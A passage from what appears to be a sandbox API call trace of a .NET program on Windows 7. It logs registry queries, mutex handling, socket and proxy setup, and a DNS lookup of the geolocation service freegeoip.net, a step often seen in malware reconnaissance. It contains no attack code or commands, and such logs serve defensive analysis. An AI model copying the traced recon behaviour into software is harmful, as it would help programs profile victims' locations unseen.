Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ec0c | out: phkResult=0x18ec0c*=0x254) returned 0x0 [0028.429] RegQueryValueExW (in: hKey=0x254, lpValueName="Library", lpReserved=0x0, lpType=0x18ec54, lpData=0x0, lpcbData=0x18ec50*=0x0 | out: lpType=0x18ec54*=0x1, lpData=0x0, lpcbData=0x18ec50*=0x1c) returned 0x0 [0028.429] RegQueryValueExW (in: hKey=0x254, lpValueName="Library", lpReserved=0x0, lpType=0x18ec54, lpData=0x3521e8, lpcbData=0x18ec50*=0x1c | out: lpType=0x18ec54*=0x1, lpData="netfxperf.dll", lpcbData=0x18ec50*=0x1c) returned 0x0 [0028.429] RegQueryValueExW (in: hKey=0x254, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x18ec54, lpData=0x0, lpcbData=0x18ec50*=0x0 | out: lpType=0x18ec54*=0x4, lpData=0x0, lpcbData=0x18ec50*=0x4) returned 0x0 [0028.431] RegQueryValueExW (in: hKey=0x254, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec40, lpcbData=0x18ec50*=0x4 | out: lpType=0x18ec54*=0x4, lpData=0x18ec40*=0x1, lpcbData=0x18ec50*=0x4) returned 0x0 [0028.431] RegQueryValueExW (in: hKey=0x254, lpValueName="First Counter", lpReserved=0x0, lpType=0x18ec54, lpData=0x0, lpcbData=0x18ec50*=0x0 | out: lpType=0x18ec54*=0x4, lpData=0x0, lpcbData=0x18ec50*=0x4) returned 0x0 [0028.431] RegQueryValueExW (in: hKey=0x254, lpValueName="First Counter", lpReserved=0x0, lpType=0x18ec54, lpData=0x18ec40, lpcbData=0x18ec50*=0x4 | out: lpType=0x18ec54*=0x4, lpData=0x18ec40*=0x1040, lpcbData=0x18ec50*=0x4) returned 0x0 [0028.431] RegCloseKey (hKey=0x254) returned 0x0 [0028.433] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x18ec08 | out: phkResult=0x18ec08*=0x254) returned 0x0 [0028.433] RegQueryValueExW (in: hKey=0x254, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x18ec50, lpData=0x0, lpcbData=0x18ec4c*=0x0 | out: lpType=0x18ec50*=0x4, lpData=0x0, lpcbData=0x18ec4c*=0x4) returned 0x0 [0028.433] RegQueryValueExW (in: hKey=0x254, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x18ec50, lpData=0x18ec3c, lpcbData=0x18ec4c*=0x4 | out: lpType=0x18ec50*=0x4, lpData=0x18ec3c*=0x3, lpcbData=0x18ec4c*=0x4) returned 0x0 [0028.433] RegQueryValueExW (in: hKey=0x254, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x18ec50, lpData=0x0, lpcbData=0x18ec4c*=0x0 | out: lpType=0x18ec50*=0x4, lpData=0x0, lpcbData=0x18ec4c*=0x4) returned 0x0 [0028.433] RegQueryValueExW (in: hKey=0x254, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x18ec50, lpData=0x18ec3c, lpcbData=0x18ec4c*=0x4 | out: lpType=0x18ec50*=0x4, lpData=0x18ec3c*=0x20000, lpcbData=0x18ec4c*=0x4) returned 0x0 [0028.433] RegQueryValueExW (in: hKey=0x254, lpValueName="Counter Names", lpReserved=0x0, lpType=0x18ec50, lpData=0x0, lpcbData=0x18ec4c*=0x0 | out: lpType=0x18ec50*=0x3, lpData=0x0, lpcbData=0x18ec4c*=0xaa) returned 0x0 [0028.433] RegQueryValueExW (in: hKey=0x254, lpValueName="Counter Names", lpReserved=0x0, lpType=0x18ec50, lpData=0x1b0c8e0, lpcbData=0x18ec4c*=0xaa | out: lpType=0x18ec50*=0x3, lpData=0x1b0c8e0*, lpcbData=0x18ec4c*=0xaa) returned 0x0 [0028.436] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0028.437] GetLastError () returned 0x0 [0028.439] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x352218, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x25c [0028.439] GetLastError () returned 0x0 [0028.440] MapViewOfFile (hFileMappingObject=0x25c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x840000 [0028.441] VirtualQuery (in: lpAddress=0x840000, lpBuffer=0x18ec20, dwLength=0x1c | out: lpBuffer=0x18ec20*(BaseAddress=0x840000, AllocationBase=0x840000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0028.441] GetLastError () returned 0x0 [0028.442] LocalFree (hMem=0x3397f8) returned 0x0 [0028.442] RegCloseKey (hKey=0x254) returned 0x0 [0028.456] GetVersionExW (in: lpVersionInformation=0x352200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x352200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0028.456] GetLastError () returned 0x0 [0028.457] GetVersionExW (in: lpVersionInformation=0x352200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x352200*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0028.457] GetLastError () returned 0x0 [0028.458] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b0d388, cbSid=0x18ec00 | out: pSid=0x1b0d388*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ec00) returned 1 [0028.458] GetLastError () returned 0x0 [0028.460] CreateMutexW (lpMutexAttributes=0x1b0d4d8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x254 [0028.460] GetLastError () returned 0x0 [0028.461] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x1f4) returned 0x0 [0028.461] GetLastError () returned 0x0 [0028.461] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b0d6ac, cbSid=0x18ebc0 | out: pSid=0x1b0d6ac*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ebc0) returned 1 [0028.461] GetLastError () returned 0x0 [0028.461] CreateMutexW (lpMutexAttributes=0x1b0d7bc, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0 [0028.461] GetLastError () returned 0x5 [0028.462] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x260 [0028.462] GetLastError () returned 0x5 [0028.463] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0x1f4) returned 0x0 [0028.463] GetLastError () returned 0x5 [0028.463] ReleaseMutex (hMutex=0x260) returned 1 [0028.463] GetLastError () returned 0x5 [0028.463] CloseHandle (hObject=0x260) returned 1 [0028.463] GetLastError () returned 0x5 [0028.463] GetCurrentProcessId () returned 0x9e0 [0028.465] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x260 [0028.465] GetLastError () returned 0x5 [0028.466] GetProcessTimes (in: hProcess=0x260, lpCreationTime=0x18ebc4, lpExitTime=0x18ebbc, lpKernelTime=0x18ebbc, lpUserTime=0x18ebbc | out: lpCreationTime=0x18ebc4, lpExitTime=0x18ebbc, lpKernelTime=0x18ebbc, lpUserTime=0x18ebbc) returned 1 [0028.466] GetLastError () returned 0x5 [0028.467] CloseHandle (hObject=0x260) returned 1 [0028.467] GetLastError () returned 0x5 [0028.467] ReleaseMutex (hMutex=0x254) returned 1 [0028.467] GetLastError () returned 0x5 [0028.467] CloseHandle (hObject=0x254) returned 1 [0028.467] GetLastError () returned 0x5 [0028.467] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b0e0b0, cbSid=0x18ec00 | out: pSid=0x1b0e0b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ec00) returned 1 [0028.467] GetLastError () returned 0x5 [0028.467] CreateMutexW (lpMutexAttributes=0x1b0e1c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x254 [0028.468] GetLastError () returned 0x0 [0028.468] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x1f4) returned 0x0 [0028.468] GetLastError () returned 0x0 [0028.471] ReleaseMutex (hMutex=0x254) returned 1 [0028.471] GetLastError () returned 0x0 [0028.471] CloseHandle (hObject=0x254) returned 1 [0028.471] GetLastError () returned 0x0 [0028.471] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b0eb20, cbSid=0x18ec00 | out: pSid=0x1b0eb20*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ec00) returned 1 [0028.471] GetLastError () returned 0x0 [0028.472] CreateMutexW (lpMutexAttributes=0x1b0ec30, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x254 [0028.472] GetLastError () returned 0x0 [0028.472] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x1f4) returned 0x0 [0028.472] GetLastError () returned 0x0 [0028.472] ReleaseMutex (hMutex=0x254) returned 1 [0028.472] GetLastError () returned 0x0 [0028.472] CloseHandle (hObject=0x254) returned 1 [0028.472] GetLastError () returned 0x0 [0028.472] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b0f3b0, cbSid=0x18ec00 | out: pSid=0x1b0f3b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ec00) returned 1 [0028.472] GetLastError () returned 0x0 [0028.472] CreateMutexW (lpMutexAttributes=0x1b0f4c0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x254 [0028.472] GetLastError () returned 0x0 [0028.472] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x1f4) returned 0x0 [0028.472] GetLastError () returned 0x0 [0028.472] ReleaseMutex (hMutex=0x254) returned 1 [0028.472] GetLastError () returned 0x0 [0028.473] CloseHandle (hObject=0x254) returned 1 [0028.473] GetLastError () returned 0x0 [0028.473] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b0fc38, cbSid=0x18ec00 | out: pSid=0x1b0fc38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ec00) returned 1 [0028.473] GetLastError () returned 0x0 [0028.473] CreateMutexW (lpMutexAttributes=0x1b0fd48, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x254 [0028.473] GetLastError () returned 0x0 [0028.473] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x1f4) returned 0x0 [0028.473] GetLastError () returned 0x0 [0028.473] ReleaseMutex (hMutex=0x254) returned 1 [0028.473] GetLastError () returned 0x0 [0028.473] CloseHandle (hObject=0x254) returned 1 [0028.473] GetLastError () returned 0x0 [0028.474] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b104c4, cbSid=0x18ebf8 | out: pSid=0x1b104c4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ebf8) returned 1 [0028.474] GetLastError () returned 0x0 [0028.474] CreateMutexW (lpMutexAttributes=0x1b105d4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x254 [0028.474] GetLastError () returned 0x0 [0028.474] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x1f4) returned 0x0 [0028.474] GetLastError () returned 0x0 [0028.474] ReleaseMutex (hMutex=0x254) returned 1 [0028.474] GetLastError () returned 0x0 [0028.474] CloseHandle (hObject=0x254) returned 1 [0028.474] GetLastError () returned 0x0 [0028.474] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b10d5c, cbSid=0x18ebf8 | out: pSid=0x1b10d5c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ebf8) returned 1 [0028.474] GetLastError () returned 0x0 [0028.475] CreateMutexW (lpMutexAttributes=0x1b10e6c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x254 [0028.475] GetLastError () returned 0x0 [0028.475] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x1f4) returned 0x0 [0028.475] GetLastError () returned 0x0 [0028.475] ReleaseMutex (hMutex=0x254) returned 1 [0028.475] GetLastError () returned 0x0 [0028.475] CloseHandle (hObject=0x254) returned 1 [0028.475] GetLastError () returned 0x0 [0028.475] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b115d0, cbSid=0x18ebf8 | out: pSid=0x1b115d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ebf8) returned 1 [0028.475] GetLastError () returned 0x0 [0028.475] CreateMutexW (lpMutexAttributes=0x1b116e0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x254 [0028.475] GetLastError () returned 0x0 [0028.475] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x1f4) returned 0x0 [0028.475] GetLastError () returned 0x0 [0028.476] ReleaseMutex (hMutex=0x254) returned 1 [0028.476] GetLastError () returned 0x0 [0028.476] CloseHandle (hObject=0x254) returned 1 [0028.476] GetLastError () returned 0x0 [0028.476] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b11e54, cbSid=0x18ebf8 | out: pSid=0x1b11e54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ebf8) returned 1 [0028.476] GetLastError () returned 0x0 [0028.476] CreateMutexW (lpMutexAttributes=0x1b11f64, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x254 [0028.476] GetLastError () returned 0x0 [0028.476] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x1f4) returned 0x0 [0028.476] GetLastError () returned 0x0 [0028.476] ReleaseMutex (hMutex=0x254) returned 1 [0028.476] GetLastError () returned 0x0 [0028.477] CloseHandle (hObject=0x254) returned 1 [0028.477] GetLastError () returned 0x0 [0028.477] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x1b126d0, cbSid=0x18ebf8 | out: pSid=0x1b126d0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x18ebf8) returned 1 [0028.477] GetLastError () returned 0x0 [0028.477] CreateMutexW (lpMutexAttributes=0x1b127e0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x254 [0028.477] GetLastError () returned 0x0 [0028.477] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0x1f4) returned 0x0 [0028.477] GetLastError () returned 0x0 [0028.477] ReleaseMutex (hMutex=0x254) returned 1 [0028.477] GetLastError () returned 0x0 [0028.477] CloseHandle (hObject=0x254) returned 1 [0028.477] GetLastError () returned 0x0 [0028.481] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x254 [0028.482] GetLastError () returned 0x0 [0028.482] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x260 [0028.482] GetLastError () returned 0x0 [0028.483] ioctlsocket (in: s=0x254, cmd=-2147195266, argp=0x18ee44 | out: argp=0x18ee44) returned 0 [0028.483] GetLastError () returned 0x0 [0028.490] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x264 [0028.490] GetLastError () returned 0x0 [0028.490] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x268 [0028.490] GetLastError () returned 0x0 [0028.490] ioctlsocket (in: s=0x264, cmd=-2147195266, argp=0x18ee44 | out: argp=0x18ee44) returned 0 [0028.490] GetLastError () returned 0x0 [0028.491] WSAIoctl (in: s=0x254, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18ee28, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18ee28, lpOverlapped=0x0) returned -1 [0028.491] GetLastError () returned 0x2733 [0028.492] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x364560, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0028.504] GetLastError () returned 0x2733 [0028.505] WSAEventSelect (s=0x254, hEventObject=0x260, lNetworkEvents=512) returned 0 [0028.505] GetLastError () returned 0x0 [0028.505] WSAIoctl (in: s=0x264, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18ee28, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18ee28, lpOverlapped=0x0) returned -1 [0028.505] GetLastError () returned 0x2733 [0028.505] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x364560, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0028.505] GetLastError () returned 0x2733 [0028.516] WSAEventSelect (s=0x264, hEventObject=0x268, lNetworkEvents=512) returned 0 [0028.516] GetLastError () returned 0x0 [0028.517] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x270 [0028.517] GetLastError () returned 0x0 [0028.517] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x270, param_3=0x3) returned 0x0 [0028.521] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x18ee0c | out: phkResult=0x18ee0c*=0x288) returned 0x0 [0028.521] GetLastError () returned 0x0 [0028.523] RegOpenKeyExW (in: hKey=0x288, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x18edc8 | out: phkResult=0x18edc8*=0x28c) returned 0x0 [0028.523] GetLastError () returned 0x0 [0028.523] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x290 [0028.523] GetLastError () returned 0x0 [0028.524] RegNotifyChangeKeyValue (hKey=0x28c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x290, fAsynchronous=1) returned 0x0 [0028.524] GetLastError () returned 0x0 [0028.525] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x18edc8 | out: phkResult=0x18edc8*=0x294) returned 0x0 [0028.525] GetLastError () returned 0x0 [0028.525] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x298 [0028.525] GetLastError () returned 0x0 [0028.525] RegNotifyChangeKeyValue (hKey=0x294, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x298, fAsynchronous=1) returned 0x0 [0028.525] GetLastError () returned 0x0 [0028.525] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x18edc8 | out: phkResult=0x18edc8*=0x29c) returned 0x0 [0028.526] GetLastError () returned 0x0 [0028.526] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2a0 [0028.526] GetLastError () returned 0x0 [0028.526] RegNotifyChangeKeyValue (hKey=0x29c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2a0, fAsynchronous=1) returned 0x0 [0028.526] GetLastError () returned 0x0 [0028.526] GetCurrentProcess () returned 0xffffffff [0028.526] GetLastError () returned 0x3f0 [0028.526] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18edb0 | out: TokenHandle=0x18edb0*=0x2a4) returned 1 [0028.526] GetLastError () returned 0x3f0 [0028.529] GetCurrentProcess () returned 0xffffffff [0028.529] GetLastError () returned 0x3f0 [0028.529] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e9cc | out: TokenHandle=0x18e9cc*=0x2a8) returned 1 [0028.529] GetLastError () returned 0x3f0 [0028.531] GetCurrentProcess () returned 0xffffffff [0028.531] GetLastError () returned 0x3f0 [0028.531] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18e9dc | out: TokenHandle=0x18e9dc*=0x2ac) returned 1 [0028.531] GetLastError () returned 0x3f0 [0028.619] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x3521e8 | out: pProxyConfig=0x3521e8) returned 1 [0029.006] GetLastError () returned 0x0 [0029.012] SetEvent (hEvent=0x1b4) returned 1 [0029.012] GetLastError () returned 0x0 [0029.025] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18ed44*=0x270, lpdwindex=0x18eafc | out: lpdwindex=0x18eafc) returned 0x80010115 [0029.153] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18ed24*=0x260, lpdwindex=0x18eadc | out: lpdwindex=0x18eadc) returned 0x80010115 [0029.153] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18ed24*=0x268, lpdwindex=0x18eadc | out: lpdwindex=0x18eadc) returned 0x80010115 [0029.154] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18ed78*=0x290, lpdwindex=0x18eb30 | out: lpdwindex=0x18eb30) returned 0x80010115 [0029.154] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18ed78*=0x298, lpdwindex=0x18eb30 | out: lpdwindex=0x18eb30) returned 0x80010115 [0029.154] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x18ed78*=0x2a0, lpdwindex=0x18eb30 | out: lpdwindex=0x18eb30) returned 0x80010115 [0029.159] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x1, ppwstrAutoConfigUrl=0x18ed64 | out: ppwstrAutoConfigUrl=0x18ed64*=0x0) returned 0 [0029.174] GetLastError () returned 0x2f94 [0029.174] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x2, ppwstrAutoConfigUrl=0x18ed64 | out: ppwstrAutoConfigUrl=0x18ed64*=0x0) returned 0 [0031.876] GetLastError () returned 0x2f94 [0031.897] GetCurrentProcess () returned 0xffffffff [0031.897] GetLastError () returned 0x3f0 [0031.897] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ea04 | out: TokenHandle=0x18ea04*=0x348) returned 1 [0031.897] GetLastError () returned 0x3f0 [0031.901] GetCurrentProcess () returned 0xffffffff [0031.901] GetLastError () returned 0x3f0 [0031.901] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18ea14 | out: TokenHandle=0x18ea14*=0x31c) returned 1 [0031.901] GetLastError () returned 0x3f0 [0031.903] SetEvent (hEvent=0x1b4) returned 1 [0031.903] GetLastError () returned 0x3f0 [0032.090] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x18ed64 | out: pFixedInfo=0x0, pOutBufLen=0x18ed64) returned 0x6f [0032.099] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x37dc30 [0032.099] GetLastError () returned 0x0 [0032.099] GetNetworkParams (in: pFixedInfo=0x37dc30, pOutBufLen=0x18ed64 | out: pFixedInfo=0x37dc30, pOutBufLen=0x18ed64) returned 0x0 [0032.267] inet_addr (cp="192.168.0.1") returned 0x100a8c0 [0032.267] GetLastError () returned 0x0 [0032.282] LocalFree (hMem=0x37dc30) returned 0x0 [0032.282] GetLastError () returned 0x0 [0032.310] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x354 [0032.310] GetLastError () returned 0x0 [0032.312] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x350 [0032.312] GetLastError () returned 0x0 [0032.322] getaddrinfo (in: pNodeName="freegeoip.net", pServiceName=0x0, pHints=0x18ec40*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x18e9d4 | out: ppResult=0x18e9d4*=0x39c1f0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="freegeoip.net", ai_addr=0x395a18*(sa_family=2, sin_port=0x0, sin_addr="104.31.11.172"), ai_next=0x39c470*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x39b780*(sa_family=2, sin_port=0x0, sin_addr="104.31.10.172"), ai_next=0x0))) returned 0 [0032.453] GetLastError () returned 0x0 [0032.454] FreeAddrInfoW (pAddrInfo=0x39c1f0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="牦敥敧楯⹰敮t", ai_addr=0x395a18*(sa_family=2, sin_port=0x0, sin_addr="104.31.11.172"), ai_next=0x39c470*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x39b780*(sa_family=2, sin_port=0x0, sin_addr="104.31.10.172"), ai_next=0x0))) [0032.454] GetLastError () returned 0x0 [0032.454] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x34c [0032.454] GetLastError () returned 0x0 [0032.454] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x364 [0032.454] GetLastError () returned 0x0 [0032.454] ioctlsocket (in: s=0x34c, cmd=-2147195266, argp=0x18ec24 | out: argp=0x18ec24) returned 0 [0032.454] GetLastError () returned 0x0 [0032.454] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x368 [0032.455] GetLastError () returned 0x0 [0032.455] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x36c [0032.455] GetLastError () returned 0x0 [0032.455] ioctlsocket (in: s=0x368, cmd=-2147195266, argp=0x18ec24 | out: argp=0x18ec24) returned 0 [0032.455] GetLastError () returned 0x0 [0032.455] WSAIoctl (in: s=0x34c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18ec08, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18ec08, lpOverlapped=0x0) returned -1 [0032.455] GetLastError () returned 0x2733 [0032.455] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x364560, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0032.455] GetLastError () returned 0x2733 [0032.455] WSAEventSelect (s=0x34c, hEventObject=0x364, lNetworkEvents=512) returned 0 [0032.455] GetLastError () returned 0x0 [0032.455] WSAIoctl (in: s=0x368, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, 